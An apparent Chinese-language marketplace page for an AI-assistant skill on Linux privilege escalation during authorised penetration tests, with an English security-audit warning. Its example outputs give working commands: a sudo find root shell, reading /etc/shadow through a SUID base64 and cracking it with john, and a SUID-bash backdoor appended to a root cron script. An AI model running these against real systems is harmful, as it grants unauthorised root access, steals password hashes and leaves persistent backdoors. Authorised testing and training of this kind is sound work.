linux-privilege-escalation
执行Linux权限提升评估
安全专业人员需要在授权的渗透测试期间使用系统化方法识别Linux系统上的权限提升向量。此技能提供全面的枚举和利用工作流程,涵盖内核漏洞、sudo错误配置、SUID二进制文件和定时任务弱点。
下载技能 ZIP
在 Claude 中上传
前往 设置 → 功能 → 技能 → 上传技能
开启并开始使用
测试它
正在使用“linux-privilege-escalation”。 用户运行sudo -l发现可以以root身份执行/usr/bin/find
预期结果:
GTFOBins利用:运行'sudo find . -exec /bin/bash \; -quit'来生成root shell。find命令的-exec标志允许使用root权限执行任意命令。
正在使用“linux-privilege-escalation”。 发现位于/usr/bin/base64的SUID base64二进制文件
预期结果:
利用:使用'base64 /etc/shadow | base64 -d > shadow.txt'来提取密码哈希值。将shadow.txt传输到攻击者机器并使用'john --wordlist=rockyou.txt shadow.txt'破解以恢复明文密码。
正在使用“linux-privilege-escalation”。 Root定时任务执行/opt/scripts/backup.sh中的可写脚本
预期结果:
劫持:将'cp /bin/bash /tmp/bash; chmod +s /tmp/bash'追加到脚本中。定时任务执行后,运行'/tmp/bash -p'通过SUID后门获得持久的root访问权限。
安全审计
严重This skill contains complete weaponized exploitation workflows for Linux privilege escalation. While framed as educational content for penetration testing, it provides ready-to-use commands for gaining unauthorized root access, credential theft via /etc/shadow access, SUID backdoor creation, kernel exploitation, and persistent reverse shell payloads. The static scanner correctly identified 44 high-risk patterns including sudo exploitation, SUID manipulation, and shadow file access. False positives include Ruby backtick detection (actually bash commands in markdown). This content should only be distributed in controlled professional security contexts with explicit authorization requirements.
严重问题 (4)
高风险问题 (6)
中风险问题 (3)
低风险问题 (3)
风险因素
⚡ 包含脚本 (1)
⚙️ 外部命令 (7)
🌐 网络访问 (4)
检测到的模式
质量评分
你能构建什么
授权渗透测试
执行内部网络评估的安全顾问使用此技能系统地识别权限提升路径并展示初始访问的业务影响。
安全审计与合规
系统管理员审计自己的基础设施,以在攻击者利用之前识别并修复错误配置。
安全培训与教育
准备OSCP、GPEN或CRT等认证考试的安全专业人员使用此技能在实验环境中了解常见的Linux权限提升技术。
试试这些提示
我拥有对Linux系统的低权限shell访问权限。请帮助我枚举系统以识别潜在的权限提升向量,包括内核版本、sudo权限、SUID二进制文件和运行的服务。
我运行'sudo -l'看到我对特定二进制文件有NOPASSWD访问权限。分析输出并为每个允许的命令提供GTFOBins利用技术。
查找此系统上的所有SUID二进制文件,并识别哪些可以被利用进行权限提升。为每个易受攻击的二进制文件提供具体的利用命令。
内核版本是[VERSION]。搜索适用于此内核的已知漏洞利用代码,并提供编译和执行说明。如果主要漏洞利用代码失败,请包括备用选项。
最佳实践
- 始终在测试前获得书面授权并验证范围边界
- 在生产环境使用内核漏洞利用代码之前先在实验室环境中测试,以避免系统崩溃
- 记录评估期间所做的所有更改,以便进行修复和清理
避免
- 在不了解其机制或失败模式的情况下运行内核漏洞利用代码
- 在授权评估期之外创建持久后门
- 访问或窃取超出证明权限提升所需的数据
常见问题
此技能是否合法可用?
内核漏洞利用代码是否适用于所有Linux系统?
如果漏洞利用代码导致系统崩溃该怎么办?
我如何知道SUID二进制文件是否可被利用?
此技能是否可用于AWS或Azure等云环境?
此技能与LinPEAS等工具有什么区别?
开发者详情
作者
zebbern许可证
MIT
仓库
https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/linux-privilege-escalation引用
main
文件结构
📄 SKILL.md